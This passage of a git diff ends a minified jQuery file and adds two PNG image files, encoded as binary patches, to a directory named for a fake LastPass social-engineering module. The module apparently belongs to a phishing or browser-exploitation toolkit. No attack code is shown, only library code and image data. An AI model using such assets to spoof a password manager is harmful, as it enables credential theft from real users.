c;if(r===2){if(!n){n={};while(c=bv.exec(m))n[c[1].toLowerCase()]=c[2]}c=n[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){r||(e.mimeType=a);return this},abort:function(a){a=a||"abort",o&&o.abort(a),v(0,a);return this}};h.promise(u),u.success=u.done,u.error=u.fail,u.complete=i.done,u.statusCode=function(a){if(a){var b;if(r<2)for(b in a)j[b]=[j[b],a[b]];else b=a[u.status],u.then(b,b)}return this},e.url=((a||e.url)+"").replace(bu,"").replace(bz,bM[1]+"//"),e.dataTypes=d.trim(e.dataType||"*").toLowerCase().split(bD),e.crossDomain==null&&(q=bH.exec(e.url.toLowerCase()),e.crossDomain=q&&(q[1]!=bM[1]||q[2]!=bM[2]||(q[3]||(q[1]==="http:"?80:443))!=(bM[3]||(bM[1]==="http:"?80:443)))),e.data&&e.processData&&typeof e.data!=="string"&&(e.data=d.param(e.data,e.traditional)),bP(bJ,e,c,u);if(r===2)return!1;s=e.global,e.type=e.type.toUpperCase(),e.hasContent=!by.test(e.type),s&&d.active++===0&&d.event.trigger("ajaxStart");if(!e.hasContent){e.data&&(e.url+=(bA.test(e.url)?"&":"?")+e.data),k=e.url;if(e.cache===!1){var w=d.now(),x=e.url.replace(bE,"$1_="+w);e.url=x+(x===e.url?(bA.test(e.url)?"&":"?")+"_="+w:"")}}if(e.data&&e.hasContent&&e.contentType!==!1||c.contentType)l["Content-Type"]=e.contentType;e.ifModified&&(k=k||e.url,d.lastModified[k]&&(l["If-Modified-Since"]=d.lastModified[k]),d.etag[k]&&(l["If-None-Match"]=d.etag[k])),l.Accept=e.dataTypes[0]&&e.accepts[e.dataTypes[0]]?e.accepts[e.dataTypes[0]]+(e.dataTypes[0]!=="*"?", */*; q=0.01":""):e.accepts["*"];for(t in e.headers)u.setRequestHeader(t,e.headers[t]);if(e.beforeSend&&(e.beforeSend.call(f,u,e)===!1||r===2)){u.abort();return!1}for(t in {success:1,error:1,complete:1})u[t](e[t]);o=bP(bK,e,c,u);if(o){u.readyState=1,s&&g.trigger("ajaxSend",[u,e]),e.async&&e.timeout>0&&(p=setTimeout(function(){u.abort("timeout")},e.timeout));try{r=1,o.send(l,v)}catch(y){status<2?v(-1,y):d.error(y)}}else v(-1,"No Transport");return u},param:function(a,c){var e=[],f=function(a,b){b=d.isFunction(b)?b():b,e[e.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};c===b&&(c=d.ajaxSettings.traditional);if(d.isArray(a)||a.jquery&&!d.isPlainObject(a))d.each(a,function(){f(this.name,this.value)});else for(var g in a)bQ(g,a[g],c,f);return e.join("&").replace(br,"+")}}),d.extend({active:0,lastModified:{},etag:{}});var bT=d.now(),bU=/(\=)\?(&|$)|\?\?/i;d.ajaxSetup({jsonp:"callback",jsonpCallback:function(){return d.expando+"_"+bT++}}),d.ajaxPrefilter("json jsonp",function(b,c,e){var f=typeof b.data==="string";if(b.dataTypes[0]==="jsonp"||c.jsonpCallback||c.jsonp!=null||b.jsonp!==!1&&(bU.test(b.url)||f&&bU.test(b.data))){var g,h=b.jsonpCallback=d.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,i=a[h],j=b.url,k=b.data,l="$1"+h+"$2",m=function(){a[h]=i,g&&d.isFunction(i)&&a[h](g[0])};b.jsonp!==!1&&(j=j.replace(bU,l),b.url===j&&(f&&(k=k.replace(bU,l)),b.data===k&&(j+=(/\?/.test(j)?"&":"?")+b.jsonp+"="+h))),b.url=j,b.data=k,a[h]=function(a){g=[a]},e.then(m,m),b.converters["script json"]=function(){g||d.error(h+" was not called");return g[0]},b.dataTypes[0]="json";return"script"}}),d.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){d.globalEval(a);return a}}}),d.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),d.ajaxTransport("script",function(a){if(a.crossDomain){var d,e=c.head||c.getElementsByTagName("head")[0]||c.documentElement;return{send:function(f,g){d=c.createElement("script"),d.async="async",a.scriptCharset&&(d.charset=a.scriptCharset),d.src=a.url,d.onload=d.onreadystatechange=function(a,c){if(!d.readyState||/loaded|complete/.test(d.readyState))d.onload=d.onreadystatechange=null,e&&d.parentNode&&e.removeChild(d),d=b,c||g(200,"success")},e.insertBefore(d,e.firstChild)},abort:function(){d&&d.onload(0,1)}}}});var bV=d.now(),bW,bX;d.ajaxSettings.xhr=a.ActiveXObject?function(){return!this.isLocal&&bZ()||b$()}:bZ,bX=d.ajaxSettings.xhr(),d.support.ajax=!!bX,d.support.cors=bX&&"withCredentials"in bX,bX=b,d.support.ajax&&d.ajaxTransport(function(a){if(!a.crossDomain||d.support.cors){var c;return{send:function(e,f){var g=a.xhr(),h,i;a.username?g.open(a.type,a.url,a.async,a.username,a.password):g.open(a.type,a.url,a.async);if(a.xhrFields)for(i in a.xhrFields)g[i]=a.xhrFields[i];a.mimeType&&g.overrideMimeType&&g.overrideMimeType(a.mimeType),!a.crossDomain&&!e["X-Requested-With"]&&(e["X-Requested-With"]="XMLHttpRequest");try{for(i in e)g.setRequestHeader(i,e[i])}catch(j){}g.send(a.hasContent&&a.data||null),c=function(e,i){var j,k,l,m,n;try{if(c&&(i||g.readyState===4)){c=b,h&&(g.onreadystatechange=d.noop,delete bW[h]);if(i)g.readyState!==4&&g.abort();else{j=g.status,l=g.getAllResponseHeaders(),m={},n=g.responseXML,n&&n.documentElement&&(m.xml=n),m.text=g.responseText;try{k=g.statusText}catch(o){k=""}j||!a.isLocal||a.crossDomain?j===1223&&(j=204):j=m.text?200:404}}}catch(p){i||f(-1,p)}m&&f(j,k,m,l)},a.async&&g.readyState!==4?(bW||(bW={},bY()),h=bV++,g.onreadystatechange=bW[h]=c):c()},abort:function(){c&&c(0,1)}}}});var b_={},ca=/^(?:toggle|show|hide)$/,cb=/^([+\-]=)?([\d+.\-]+)([a-z%]*)$/i,cc,cd=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];d.fn.extend({show:function(a,b,c){var e,f;if(a||a===0)return this.animate(ce("show",3),a,b,c);for(var g=0,h=this.length;g<h;g++)e=this[g],f=e.style.display,!d._data(e,"olddisplay")&&f==="none"&&(f=e.style.display=""),f===""&&d.css(e,"display")==="none"&&d._data(e,"olddisplay",cf(e.nodeName));for(g=0;g<h;g++){e=this[g],f=e.style.display;if(f===""||f==="none")e.style.display=d._data(e,"olddisplay")||""}return this},hide:function(a,b,c){if(a||a===0)return this.animate(ce("hide",3),a,b,c);for(var e=0,f=this.length;e<f;e++){var g=d.css(this[e],"display");g!=="none"&&!d._data(this[e],"olddisplay")&&d._data(this[e],"olddisplay",g)}for(e=0;e<f;e++)this[e].style.display="none";return this},_toggle:d.fn.toggle,toggle:function(a,b,c){var e=typeof a==="boolean";d.isFunction(a)&&d.isFunction(b)?this._toggle.apply(this,arguments):a==null||e?this.each(function(){var b=e?a:d(this).is(":hidden");d(this)[b?"show":"hide"]()}):this.animate(ce("toggle",3),a,b,c);return this},fadeTo:function(a,b,c,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,e){var f=d.speed(b,c,e);if(d.isEmptyObject(a))return this.each(f.complete);return this[f.queue===!1?"each":"queue"](function(){var b=d.extend({},f),c,e=this.nodeType===1,g=e&&d(this).is(":hidden"),h=this;for(c in a){var i=d.camelCase(c);c!==i&&(a[i]=a[c],delete a[c],c=i);if(a[c]==="hide"&&g||a[c]==="show"&&!g)return b.complete.call(this);if(e&&(c==="height"||c==="width")){b.overflow=[this.style.overflow,this.style.overflowX,this.style.overflowY];if(d.css(this,"display")==="inline"&&d.css(this,"float")==="none")if(d.support.inlineBlockNeedsLayout){var j=cf(this.nodeName);j==="inline"?this.style.display="inline-block":(this.style.display="inline",this.style.zoom=1)}else this.style.display="inline-block"}d.isArray(a[c])&&((b.specialEasing=b.specialEasing||{})[c]=a[c][1],a[c]=a[c][0])}b.overflow!=null&&(this.style.overflow="hidden"),b.curAnim=d.extend({},a),d.each(a,function(c,e){var f=new d.fx(h,b,c);if(ca.test(e))f[e==="toggle"?g?"show":"hide":e](a);else{var i=cb.exec(e),j=f.cur();if(i){var k=parseFloat(i[2]),l=i[3]||(d.cssNumber[c]?"":"px");l!=="px"&&(d.style(h,c,(k||1)+l),j=(k||1)/f.cur()*j,d.style(h,c,j+l)),i[1]&&(k=(i[1]==="-="?-1:1)*k+j),f.custom(j,k,l)}else f.custom(j,e,"")}});return!0})},stop:function(a,b){var c=d.timers;a&&this.queue([]),this.each(function(){for(var a=c.length-1;a>=0;a--)c[a].elem===this&&(b&&c[a](!0),c.splice(a,1))}),b||this.dequeue();return this}}),d.each({slideDown:ce("show",1),slideUp:ce("hide",1),slideToggle:ce("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){d.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),d.extend({speed:function(a,b,c){var e=a&&typeof a==="object"?d.extend({},a):{complete:c||!c&&b||d.isFunction(a)&&a,duration:a,easing:c&&b||b&&!d.isFunction(b)&&b};e.duration=d.fx.off?0:typeof e.duration==="number"?e.duration:e.duration in d.fx.speeds?d.fx.speeds[e.duration]:d.fx.speeds._default,e.old=e.complete,e.complete=function(){e.queue!==!1&&d(this).dequeue(),d.isFunction(e.old)&&e.old.call(this)};return e},easing:{linear:function(a,b,c,d){return c+d*a},swing:function(a,b,c,d){return(-Math.cos(a*Math.PI)/2+.5)*d+c}},timers:[],fx:function(a,b,c){this.options=b,this.elem=a,this.prop=c,b.orig||(b.orig={})}}),d.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this),(d.fx.step[this.prop]||d.fx.step._default)(this)},cur:function(){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];var a,b=d.css(this.elem,this.prop);return isNaN(a=parseFloat(b))?!b||b==="auto"?0:b:a},custom:function(a,b,c){function g(a){return e.step(a)}var e=this,f=d.fx;this.startTime=d.now(),this.start=a,this.end=b,this.unit=c||this.unit||(d.cssNumber[this.prop]?"":"px"),this.now=this.start,this.pos=this.state=0,g.elem=this.elem,g()&&d.timers.push(g)&&!cc&&(cc=setInterval(f.tick,f.interval))},show:function(){this.options.orig[this.prop]=d.style(this.elem,this.prop),this.options.show=!0,this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur()),d(this.elem).show()},hide:function(){this.options.orig[this.prop]=d.style(this.elem,this.prop),this.options.hide=!0,this.custom(this.cur(),0)},step:function(a){var b=d.now(),c=!0;if(a||b>=this.options.duration+this.startTime){this.now=this.end,this.pos=this.state=1,this.update(),this.options.curAnim[this.prop]=!0;for(var e in this.options.curAnim)this.options.curAnim[e]!==!0&&(c=!1);if(c){if(this.options.overflow!=null&&!d.support.shrinkWrapBlocks){var f=this.elem,g=this.options;d.each(["","X","Y"],function(a,b){f.style["overflow"+b]=g.overflow[a]})}this.options.hide&&d(this.elem).hide();if(this.options.hide||this.options.show)for(var h in this.options.curAnim)d.style(this.elem,h,this.options.orig[h]);this.options.complete.call(this.elem)}return!1}var i=b-this.startTime;this.state=i/this.options.duration;var j=this.options.specialEasing&&this.options.specialEasing[this.prop],k=this.options.easing||(d.easing.swing?"swing":"linear");this.pos=d.easing[j||k](this.state,i,0,1,this.options.duration),this.now=this.start+(this.end-this.start)*this.pos,this.update();return!0}},d.extend(d.fx,{tick:function(){var a=d.timers;for(var b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||d.fx.stop()},interval:13,stop:function(){clearInterval(cc),cc=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){d.style(a.elem,"opacity",a.now)},_default:function(a){a.elem.style&&a.elem.style[a.prop]!=null?a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit:a.elem[a.prop]=a.now}}}),d.expr&&d.expr.filters&&(d.expr.filters.animated=function(a){return d.grep(d.timers,function(b){return a===b.elem}).length});var cg=/^t(?:able|d|h)$/i,ch=/^(?:body|html)$/i;"getBoundingClientRect"in c.documentElement?d.fn.offset=function(a){var b=this[0],c;if(a)return this.each(function(b){d.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return d.offset.bodyOffset(b);try{c=b.getBoundingClientRect()}catch(e){}var f=b.ownerDocument,g=f.documentElement;if(!c||!d.contains(g,b))return c?{top:c.top,left:c.left}:{top:0,left:0};var h=f.body,i=ci(f),j=g.clientTop||h.clientTop||0,k=g.clientLeft||h.clientLeft||0,l=i.pageYOffset||d.support.boxModel&&g.scrollTop||h.scrollTop,m=i.pageXOffset||d.support.boxModel&&g.scrollLeft||h.scrollLeft,n=c.top+l-j,o=c.left+m-k;return{top:n,left:o}}:d.fn.offset=function(a){var b=this[0];if(a)return this.each(function(b){d.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return d.offset.bodyOffset(b);d.offset.initialize();var c,e=b.offsetParent,f=b,g=b.ownerDocument,h=g.documentElement,i=g.body,j=g.defaultView,k=j?j.getComputedStyle(b,null):b.currentStyle,l=b.offsetTop,m=b.offsetLeft;while((b=b.parentNode)&&b!==i&&b!==h){if(d.offset.supportsFixedPosition&&k.position==="fixed")break;c=j?j.getComputedStyle(b,null):b.currentStyle,l-=b.scrollTop,m-=b.scrollLeft,b===e&&(l+=b.offsetTop,m+=b.offsetLeft,d.offset.doesNotAddBorder&&(!d.offset.doesAddBorderForTableAndCells||!cg.test(b.nodeName))&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),f=e,e=b.offsetParent),d.offset.subtractsBorderForOverflowNotVisible&&c.overflow!=="visible"&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),k=c}if(k.position==="relative"||k.position==="static")l+=i.offsetTop,m+=i.offsetLeft;d.offset.supportsFixedPosition&&k.position==="fixed"&&(l+=Math.max(h.scrollTop,i.scrollTop),m+=Math.max(h.scrollLeft,i.scrollLeft));return{top:l,left:m}},d.offset={initialize:function(){var a=c.body,b=c.createElement("div"),e,f,g,h,i=parseFloat(d.css(a,"marginTop"))||0,j="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";d.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"}),b.innerHTML=j,a.insertBefore(b,a.firstChild),e=b.firstChild,f=e.firstChild,h=e.nextSibling.firstChild.firstChild,this.doesNotAddBorder=f.offsetTop!==5,this.doesAddBorderForTableAndCells=h.offsetTop===5,f.style.position="fixed",f.style.top="20px",this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15,f.style.position=f.style.top="",e.style.overflow="hidden",e.style.position="relative",this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5,this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==i,a.removeChild(b),d.offset.initialize=d.noop},bodyOffset:function(a){var b=a.offsetTop,c=a.offsetLeft;d.offset.initialize(),d.offset.doesNotIncludeMarginInBodyOffset&&(b+=parseFloat(d.css(a,"marginTop"))||0,c+=parseFloat(d.css(a,"marginLeft"))||0);return{top:b,left:c}},setOffset:function(a,b,c){var e=d.css(a,"position");e==="static"&&(a.style.position="relative");var f=d(a),g=f.offset(),h=d.css(a,"top"),i=d.css(a,"left"),j=(e==="absolute"||e==="fixed")&&d.inArray("auto",[h,i])>-1,k={},l={},m,n;j&&(l=f.position()),m=j?l.top:parseInt(h,10)||0,n=j?l.left:parseInt(i,10)||0,d.isFunction(b)&&(b=b.call(a,c,g)),b.top!=null&&(k.top=b.top-g.top+m),b.left!=null&&(k.left=b.left-g.left+n),"using"in b?b.using.call(a,k):f.css(k)}},d.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),c=this.offset(),e=ch.test(b[0].nodeName)?{top:0,left:0}:b.offset();c.top-=parseFloat(d.css(a,"marginTop"))||0,c.left-=parseFloat(d.css(a,"marginLeft"))||0,e.top+=parseFloat(d.css(b[0],"borderTopWidth"))||0,e.left+=parseFloat(d.css(b[0],"borderLeftWidth"))||0;return{top:c.top-e.top,left:c.left-e.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||c.body;while(a&&(!ch.test(a.nodeName)&&d.css(a,"position")==="static"))a=a.offsetParent;return a})}}),d.each(["Left","Top"],function(a,c){var e="scroll"+c;d.fn[e]=function(c){var f=this[0],g;if(!f)return null;if(c!==b)return this.each(function(){g=ci(this),g?g.scrollTo(a?d(g).scrollLeft():c,a?c:d(g).scrollTop()):this[e]=c});g=ci(f);return g?"pageXOffset"in g?g[a?"pageYOffset":"pageXOffset"]:d.support.boxModel&&g.document.documentElement[e]||g.document.body[e]:f[e]}}),d.each(["Height","Width"],function(a,c){var e=c.toLowerCase();d.fn["inner"+c]=function(){return this[0]?parseFloat(d.css(this[0],e,"padding")):null},d.fn["outer"+c]=function(a){return this[0]?parseFloat(d.css(this[0],e,a?"margin":"border")):null},d.fn[e]=function(a){var f=this[0];if(!f)return a==null?null:this;if(d.isFunction(a))return this.each(function(b){var c=d(this);c[e](a.call(this,b,c[e]()))});if(d.isWindow(f)){var g=f.document.documentElement["client"+c];return f.document.compatMode==="CSS1Compat"&&g||f.document.body["client"+c]||g}if(f.nodeType===9)return Math.max(f.documentElement["client"+c],f.body["scroll"+c],f.documentElement["scroll"+c],f.body["offset"+c],f.documentElement["offset"+c]);if(a===b){var h=d.css(f,e),i=parseFloat(h);return d.isNaN(i)?h:i}return this.css(e,typeof a==="string"?a:a+"px")}}),a.jQuery=a.$=d})(window);
\ No newline at end of file
diff --git a/modules/social_engineering/fake_lastpass/key_small.png b/modules/social_engineering/fake_lastpass/key_small.png
new file mode 100644
index 0000000000000000000000000000000000000000..95b382a2ce7c11a90836ca2be6a44e4f051481f1
GIT binary patch
literal 1592
zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE1|*BCs=fdz$r9IylHmNblJdl&R0hYC{G?O`
z&)mfH)S%SFl*+=BsWuD@%qp275hW46K32*3xq68pHF_1f1wh>l3^w)^1&PVosU-?Y
zsp*+{wo31J?^jaDOtDo8H}y5}EpSfF$n>ZxN)4{^3rViZPPR-@vbR&PsjvbXkegbP
zs8ErclUHn2VXFi-*9yo63F|8<fR&VF+bTgE72zA8;GAESs$i;Tpqp%9W~g9hqGxDg
zU}<8hqhMrUXrOOsq;FuZYiM9)YHnp<r~m~@K--E^(yW49+@N*=dA3R!B_#z``ugSN
z<$C4Ddih1^`i7R4mih)p`bI{&Koz>hm3bwJ6}oxF$}kgLQj3#|G7CyF^YauyCMG83
zmzLNn0bL65LT&-v*t}wBFaZNhzap_f-%!s0<RzFwUtj!6b93RUi%Wu15$?rmaB)aw
zL8^XGYH@yPQ8F;%(v(3~6<9eJr6!i-7lq{K=fFZSAS1sdzc?emK*2fKRL@YsH!(Rg
z4<rKC;p=PVnO9trn3tUD>0+w{G(#^lGsViy(A3n(&D_n=*v;I~(AB`w$l1)&+`tSN
z>dvN47OpV8F8Rr&xv6<2Fuf^oy%q*I^@0*ZZUN9{m(-%nveXo}qWoM1u&1pual6F@
zr+HAlDLCC??ut{dKF~4xpr}QPYM2l({eYP8gbU=rlYVL*FufN66ZYoYbK@Bpm{xhZ
zIEGZ*Iuh>N^~gbFT^_3|OSXdmtE%3SRt2smY4OQ(A1r&$c8+t4|AUIAcb1OU<}Vmy
zcNV@rRw%+Mo+JV!3YE3Ie(epI*yG~6XztGkft}Mr@Bd!8ejfiM6~V<Tu4c*bsBT!F
zaOdRp_X+!pcgDD$kK%XZJn&54Ktz_0{p0VyM_zvwntxusetU$@lRyzylf<1db<9d{
zcMCS0y`OM`z1dNy|M>ZH(QCs}Hs74^w#>Wj@Wb+X&$Z2k8_w1z+_3CZ-Wc)b#ab~N
zIsQVcxyLP=6h6Ex*_Akp;q*@p0geeNMl0{hi2v;jOn)CC%xci3KSRnayy5wVXOBD{
z%nDt7b$iubJ;i6AcP3S?-MKcb+i&@0`%^Y6SSw}vkI(unUs^T)cvJ8~M!C#qqDm@d
zR<d<_<F-#NQCN_{9R-wKvcE;N|LQuf+Mk#BH{D!gA;ELX!Rc?|A%jNY_pH;hzw9gQ
zHJwl~|7@De%GTly@sZCxKgw})_le4LwcfJw=e=tDK8eM_B~EjxO|W^^_S@cUCaW_x
z-~1=2VJxVyGKA~!-G(_u4sB8&_7w>IYSU!mT6A$m!i8$7PM4I>lpm?zL?rfV_ubol
zH!pJ1Oo31x#e!qMH?36qlk?s*yFu3|=*u0A4WBMnv&4BgG|l!=3)+5L^kGQt#n2Xs
zLq2NC)rH&vZ5IuM3TCZXC&J+UGi`Tiv8jPjTh@aD3xU-M=D!aIm+oHjec958<IhCX
z#Gif(R${1NT|fWh!t1X)3lc?jyBQA0KV_`i_wj$n0q@N>bDUr6n(OYqd(Mi<CqZM&
zbIxmDFBDkh#0na9iZ1kCmvH`l(as}(>-^WOYkd5bCsW`|)^T0a2@<_-LHqAdkN*%q
zA(iFIqGYr0;lT$!)riMLy^djV$xvIdYT*ucm$m%%ED{WNyGl<u9buCKmF1qUelF{r
G5}E*r%vIt5

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/lpwhite_small.png b/modules/social_engineering/fake_lastpass/lpwhite_small.png
new file mode 100644
index 0000000000000000000000000000000000000000..45260ce2328c445c4151782e4f03a7b50108eb9d
GIT binary patch
literal 14271
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
